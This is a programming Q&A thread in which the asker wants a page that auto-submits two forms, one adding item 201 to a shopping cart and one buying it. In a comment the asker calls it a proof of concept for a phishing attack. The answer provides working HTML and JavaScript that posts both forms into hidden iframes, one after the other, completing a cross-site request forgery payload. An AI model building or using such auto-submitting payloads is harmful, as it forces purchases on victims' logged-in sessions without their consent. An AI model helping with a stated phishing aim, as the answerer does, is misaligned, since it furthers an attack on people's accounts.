# How do I automatically submit two forms (one GET, one POST)?

Tags: javascript, html, http, https

```
 <form id="addToCart" action="http://my-website/cart/action.php">
   <input type="hidden" name="action" value="add" />
   <input type="hidden" name="itemNum" value="201" />
   <input type="submit" value="Submit request" />
 </form>

 <form id="buy" action="http://my-website/cart/action.php?action=buy" method="POST">
   <input type="submit" value="Submit request" />
 </form>

 <script> 
    document.forms[0].submit();
    document.forms[1].submit();
 </script>
```

This only submits the first form but not the second. How can I get it to submit both?

Before anyone asks, I also tried this below and it still didn't work.

> `document.getElementById("addToCart").submit();`
> `document.getElementById("buy").submit();`

Comment: The culprit is that form submission reloads the page by default; unfortunately, a lot of the potential dupe questions on this site seem really outdated.

Comment: Does this answer your question? [Submit form without page reloading](https://stackoverflow.com/questions/2866063/submit-form-without-page-reloading)

Comment: Alternatively, see https://stackoverflow.com/a/59847337/7941251

Comment: Could you explain why are you trying to submit both forms? You may probably need only one depending on what's expected. Also, you have 2 separate buttons for each action.

Comment: @SuperStormer I'm not sure how to set up the iframe to make it work. I did try it and it just gave the same result. Any suggestions?

Comment: @F.Igor The purpose of this is that if I gave this form to someone, it should add an item to their cart and automatically buy it. It's a PoC for a phishing attack I'm doing.

Comment: @F.Igor Is it possible to merge the two forms so that I only have one submit button?

Answer (score 0):

One simple way to send 2 form submits at the same time is to post them to iframes with `name` (see the `target` attribute on forms).
Optionally, to make sure both requests are made in sequence, and with a small time span, you can add a delay for the second request (`setTimeout` call)

```js
document.forms[0].submit();
setTimeout(function(){
  document.forms[1].submit();
},500)
```

```html
<form id="addToCart" action="http://my-website/cart/action.php" target="frm1">
   <input type="hidden" name="action" value="add" />
   <input type="hidden" name="itemNum" value="201" />
   <input type="submit" value="Submit request" />
 </form>

 <form id="buy" action="http://my-website/cart/action.php?action=buy" method="POST" target="frm2">
   <input type="submit" value="Submit request" />
 </form>

<iframe name="frm1" ></iframe>
<iframe name="frm2" ></iframe>
```

Another way is, as suggested, to use fetch/ajax requests instead of plain form submits, but for some scenarios that could not work because of CORS  restrictions (if those requests are in a different domain).